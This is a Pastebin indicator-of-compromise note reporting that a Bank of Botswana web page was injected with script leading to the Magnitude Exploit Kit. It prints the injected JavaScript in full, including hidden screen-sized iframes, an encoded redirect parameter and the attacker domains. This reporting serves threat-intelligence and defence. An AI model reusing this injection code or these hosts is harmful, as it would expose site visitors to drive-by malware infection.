API tools faq
paste
malwageddon

IOC - www.bankofbotswana.bw website leading to Magnitude EK

malwageddon
Jun 9th, 2014
457
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 1.19 KB | None | 0 0
raw download clone embed print report
  1. Example of a compromised webpage:
  2. 200 HTTP    www.bankofbotswana.bw/index.php/content/2009103015016-market-statistics 35,882
  3.  
  4. Content injected:
  5. <!--screen-modes analyzer--><script type="text/javascript"> if (i2336 == null) { var i2336 = 1; window.status='Done'; document.write('<DIV id=check524 style="DISPLAY: none"><iframe src="http://matthews-review.bamoon.com/themes/index.php?id=aHR0cDovLzBlMzUzYy45MTUzMGU4LmEyODcuMzQ5YmM0LjBmNy4yZTI0NTIuaGJ5dHp0am8ucmVnaXN0ZXJzYmFzZWQuaW4v" width="'+screen.width+'" height="'+screen.height+'"></iframe></DIV>'); window.status='Done'; } </script><!--/screen-modes analyzer-->
  6.  
  7. Content of the webpage injected <iframe> redirects to:
  8. <html>
  9. <body>
  10. <!--screen-modes analyzer--><script type="text/javascript"> if (i2336 == null) { var i2336 = 1; window.status='Done'; document.write('<DIV id=check524 style="DISPLAY: none"><iframe src="http://0e353c.91530e8.a287.349bc4.0f7.2e2452.hbytztjo.registersbased.in/" width="'+screen.width+'" height="'+screen.height+'"></iframe></DIV>'); window.status='Done'; } </script><!--/screen-modes analyzer--></body>
  11. </html>
  12.  
  13. http://0e353c.91530e8.a287.349bc4.0f7.2e2452.hbytztjo.registersbased.in leads to Magnitude Exploit Kit landing page
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!